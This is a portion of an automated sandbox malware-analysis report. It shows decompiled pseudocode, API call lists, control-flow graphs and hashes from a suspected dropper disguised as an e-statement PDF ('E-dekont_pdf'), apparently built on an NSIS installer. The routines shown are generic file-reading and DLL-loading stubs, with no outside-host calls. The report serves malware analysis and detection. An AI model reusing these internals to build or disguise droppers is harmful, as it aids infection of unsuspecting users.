                                                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,004030A8), ref: 00405725
                                                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00405737
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll
                                                                                              • API String ID: 1495540970-1443272356
                                                                                              • Opcode ID: 779e989e11e7f56ecd15eb762b90414c7a0500fd8ad26af2e56af92178675a1e
                                                                                              • Instruction ID: c237e01f64be4bcbd85ac878387eaebe6c7da7ae9e1135af4804bf1e214aac79
                                                                                              • Opcode Fuzzy Hash: 779e989e11e7f56ecd15eb762b90414c7a0500fd8ad26af2e56af92178675a1e
                                                                                              • Instruction Fuzzy Hash: D4217A71900518BADB119FA6DD84A8EBFB8EB45360F10817AE904B62A0D77A4A509F68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 875 4026ec-402705 call 402d84 878 402c2a-402c2d 875->878 879 40270b-402712 875->879 882 402c33-402c39 878->882 880 402714 879->880 881 402717-40271a 879->881 880->881 883 402720-40272f call 4065c8 881->883 884 40287e-402886 881->884 883->884 888 402735 883->888 884->878 889 40273b-40273f 888->889 890 4027d4-4027d7 889->890 891 402745-402760 ReadFile 889->891 892 4027d9-4027dc 890->892 893 4027ef-4027ff call 4061db 890->893 891->884 894 402766-40276b 891->894 892->893 895 4027de-4027e9 call 406239 892->895 893->884 904 402801 893->904 894->884 897 402771-40277f 894->897 895->884 895->893 900 402785-402797 MultiByteToWideChar 897->900 901 40283a-402846 call 4065af 897->901 900->904 905 402799-40279c 900->905 901->882 908 402804-402807 904->908 906 40279e-4027a9 905->906 906->908 909 4027ab-4027d0 SetFilePointer MultiByteToWideChar 906->909 908->901 910 402809-40280e 908->910 909->906 911 4027d2 909->911 912 402810-402815 910->912 913 40284b-40284f 910->913 911->904 912->913 916 402817-40282a 912->916 914 402851-402855 913->914 915 40286c-402878 SetFilePointer 913->915 918 402857-40285b 914->918 919 40285d-40286a 914->919 915->884 916->884 917 40282c-402832 916->917 917->889 920 402838 917->920 918->915 918->919 919->884 920->884
                                                                                              C-Code - Quality: 87%
                                                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x1fff;
					if(__eax > 0x1fff) {
						 *(__ebp - 0x44) = 0x1fff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, "true"); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                              0x004026ec
                                                                                              0x004026ee
                                                                                              0x004026f1
                                                                                              0x004026f3
                                                                                              0x004026f6
                                                                                              0x004026fb
                                                                                              0x004026ff
                                                                                              0x00402702
                                                                                              0x00402705
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x0040270b
                                                                                              0x0040270b
                                                                                              0x00402712
                                                                                              0x00402714
                                                                                              0x00402714
                                                                                              0x0040271a
                                                                                              0x0040287e
                                                                                              0x0040287e
                                                                                              0x00402881
                                                                                              0x00402886
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00000000
                                                                                              0x00402720
                                                                                              0x00402721
                                                                                              0x0040272c
                                                                                              0x0040272f
                                                                                              0x0040273b
                                                                                              0x0040273f
                                                                                              0x004027d7
                                                                                              0x004027ef
                                                                                              0x004027ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402745
                                                                                              0x00402745
                                                                                              0x00402748
                                                                                              0x00402749
                                                                                              0x0040274c
                                                                                              0x00402751
                                                                                              0x00402758
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x00402766
                                                                                              0x00402766
                                                                                              0x0040276b
                                                                                              0x00000000
                                                                                              0x00402771
                                                                                              0x00402771
                                                                                              0x00402779
                                                                                              0x0040277c
                                                                                              0x0040277f
                                                                                              0x0040283a
                                                                                              0x00402841
                                                                                              0x00402785
                                                                                              0x0040278b
                                                                                              0x00402797
                                                                                              0x00402801
                                                                                              0x00402801
                                                                                              0x00402799
                                                                                              0x00402799
                                                                                              0x0040279c
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x0040279e
                                                                                              0x004027a1
                                                                                              0x004027a6
                                                                                              0x004027a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004027ab
                                                                                              0x004027ae
                                                                                              0x004027b6
                                                                                              0x004027c2
                                                                                              0x004027d0
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d2
                                                                                              0x00000000
                                                                                              0x004027d0
                                                                                              0x0040279e
                                                                                              0x00402804
                                                                                              0x00402807
                                                                                              0x00000000
                                                                                              0x00402809
                                                                                              0x0040280e
                                                                                              0x0040284f
                                                                                              0x00402871
                                                                                              0x00402878
                                                                                              0x0040285d
                                                                                              0x0040285d
                                                                                              0x00402860
                                                                                              0x00402863
                                                                                              0x00402866
                                                                                              0x00402866
                                                                                              0x00000000
                                                                                              0x00402817
                                                                                              0x00402817
                                                                                              0x0040281a
                                                                                              0x0040281d
                                                                                              0x00402823
                                                                                              0x00402827
                                                                                              0x0040282a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040282a
                                                                                              0x0040280e
                                                                                              0x00402807
                                                                                              0x0040277f
                                                                                              0x0040276b
                                                                                              0x00402760
                                                                                              0x00000000
                                                                                              0x0040282c
                                                                                              0x0040282c
                                                                                              0x0040282f
                                                                                              0x00402838
                                                                                              0x00000000
                                                                                              0x0040272f
                                                                                              0x0040271a
                                                                                              0x00402c33
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402793
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027B6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027CC
                                                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 0040624F
                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 00402878
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: ff2e09ca757180d5741658eaf0f2c0a372e2282fa1403efecdb78a9c85b10216
                                                                                              • Instruction ID: 1bbe20be883a7edda52fc2980df0feb54fe6c441a16e3d4a13a965921995db28
                                                                                              • Opcode Fuzzy Hash: ff2e09ca757180d5741658eaf0f2c0a372e2282fa1403efecdb78a9c85b10216
                                                                                              • Instruction Fuzzy Hash: FE510975D00219AADF20EFD5CA88AAEBBB5FF04304F10817BE541B62D4D7B49D82CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403479 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 921 403479-4034a1 GetTickCount 922 4035d1-4035d9 call 40302e 921->922 923 4034a7-4034d2 call 4035f8 SetFilePointer 921->923 928 4035db-4035df 922->928 929 4034d7-4034e9 923->929 930 4034eb 929->930 931 4034ed-4034fb call 4035e2 929->931 930->931 934 403501-40350d 931->934 935 4035c3-4035c6 931->935 936 403513-403519 934->936 935->928 937 403544-403560 call 406bb0 936->937 938 40351b-403521 936->938 943 403562-40356a 937->943 944 4035cc 937->944 938->937 939 403523-403543 call 40302e 938->939 939->937 946 40356c-403574 call 40620a 943->946 947 40358d-403593 943->947 948 4035ce-4035cf 944->948 951 403579-40357b 946->951 947->944 950 403595-403597 947->950 948->928 950->944 952 403599-4035ac 950->952 953 4035c8-4035ca 951->953 954 40357d-403589 951->954 952->929 955 4035b2-4035c1 SetFilePointer 952->955 953->948 954->936 956 40358b 954->956 955->922 956->952
                                                                                              C-Code - Quality: 94%
                                                                                              			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x4326f4; // 0xa503e
				_t34 = _t32 -  *0x41e660 + _a4;
				 *0x47026c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E("true");
					return 0;
				}
				E004035F8( *0x432704);
				SetFilePointer( *0x40a01c,  *0x41e660, 0, 0); // executed
				 *0x432700 = _t34;
				 *0x4326f0 = 0;
				while(1) {
					_t10 =  *0x4326f8; // 0x60e92
					_t31 = 0x4000;
					_t11 = _t10 -  *0x432704;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x4266f0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x432704 =  *0x432704 + _t31;
					 *0x41e680 = 0x4266f0;
					 *0x41e684 = _t31;
					L6:
					L6:
					if( *0x470270 != 0 &&  *0x470300 == 0) {
						_t19 =  *0x432700; // 0x17e0e
						 *0x4326f0 = _t19 -  *0x4326f4 - _a4 +  *0x41e660;
						E0040302E(0);
					}
					 *0x41e688 = 0x41e6f0;
					 *0x41e68c = 0x8000; // executed
					_t14 = E00406BB0(0x41e668); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x41e688; // 0x421c0f
					_t37 = _t36 - 0x41e6f0;
					if(_t37 == 0) {
						__eflags =  *0x41e684; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x4326f4; // 0xa503e
						if(_t16 -  *0x41e660 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x41e6f0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x41e660 =  *0x41e660 + _t37;
					_t49 =  *0x41e684; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                                              0x0040347c
                                                                                              0x00403489
                                                                                              0x0040349c
                                                                                              0x004034a1
                                                                                              0x004035d1
                                                                                              0x004035d3
                                                                                              0x00000000
                                                                                              0x004035d9
                                                                                              0x004034ad
                                                                                              0x004034c0
                                                                                              0x004034c6
                                                                                              0x004034cc
                                                                                              0x004034d7
                                                                                              0x004034d7
                                                                                              0x004034dc
                                                                                              0x004034e1
                                                                                              0x004034e9
                                                                                              0x004034eb
                                                                                              0x004034eb
                                                                                              0x004034f4
                                                                                              0x004034fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403501
                                                                                              0x00403507
                                                                                              0x0040350d
                                                                                              0x00000000
                                                                                              0x00403513
                                                                                              0x00403519
                                                                                              0x00403523
                                                                                              0x00403539
                                                                                              0x0040353e
                                                                                              0x00403543
                                                                                              0x00403549
                                                                                              0x0040354f
                                                                                              0x00403559
                                                                                              0x00403560
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403562
                                                                                              0x00403568
                                                                                              0x0040356a
                                                                                              0x0040358d
                                                                                              0x00403593
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403595
                                                                                              0x00403597
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403599
                                                                                              0x00403599
                                                                                              0x004035ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00403574
                                                                                              0x0040357b
                                                                                              0x004035c8
                                                                                              0x004035ce
                                                                                              0x004035ce
                                                                                              0x00000000
                                                                                              0x004035ce
                                                                                              0x0040357d
                                                                                              0x00403583
                                                                                              0x00403589
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x004035cc
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                              • SetFilePointer.KERNELBASE(000A503E,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                              Strings
                                                                                              • hA, xrefs: 00403544
                                                                                              • >P, xrefs: 0040347C, 00403599
                                                                                              • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos, xrefs: 004034ED, 004034F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer$CountTick
                                                                                              • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos$>P$hA
                                                                                              • API String ID: 1092082344-670352575
                                                                                              • Opcode ID: 4f59a052f93578e4edbbc217162d5af8593342674c3933440a0e1626f7b444ad
                                                                                              • Instruction ID: fbc15916fd798e890252dfa94d77e606639a9ce4decfb061337eb3c4842bfdd2
                                                                                              • Opcode Fuzzy Hash: 4f59a052f93578e4edbbc217162d5af8593342674c3933440a0e1626f7b444ad
                                                                                              • Instruction Fuzzy Hash: 41318F76510205EFDB249F6AEE448663BACF75431AB91853FE900B22F0C7749D41DB1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 957 4069c5-4069e5 GetSystemDirectoryW 958 4069e7 957->958 959 4069e9-4069eb 957->959 958->959 960 4069fc-4069fe 959->960 961 4069ed-4069f6 959->961 963 4069ff-406a32 wsprintfW LoadLibraryExW 960->963 961->960 962 4069f8-4069fa 961->962 962->963
                                                                                              C-Code - Quality: 100%
                                                                                              			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                              0x004069dc
                                                                                              0x004069e5
                                                                                              0x004069e7
                                                                                              0x004069e7
                                                                                              0x004069eb
                                                                                              0x004069fe
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x00406a17
                                                                                              0x00406a2b
                                                                                              0x00406a32

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                              • wsprintfW.USER32 ref: 00406A17
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F132209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
